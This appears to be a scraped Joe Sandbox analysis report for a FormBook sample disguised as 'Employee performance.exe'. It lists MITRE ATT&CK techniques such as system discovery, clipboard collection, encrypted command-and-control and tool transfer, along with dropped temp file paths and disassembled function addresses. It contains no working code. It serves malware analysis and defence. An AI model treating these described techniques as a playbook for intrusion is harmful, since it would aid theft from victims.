Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Employee performance.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autA92B.tmp

C:\Users\user\AppData\Local\Temp\autA96B.tmp

C:\Users\user\AppData\Local\Temp\carryover

C:\Users\user\AppData\Local\Temp\maneuverability

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Employee performance.exe

Function 00FD42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00FD42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 01012BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00FD2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0101065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00FD344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00FD2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00FD3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01008D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 00F92620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00FD2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre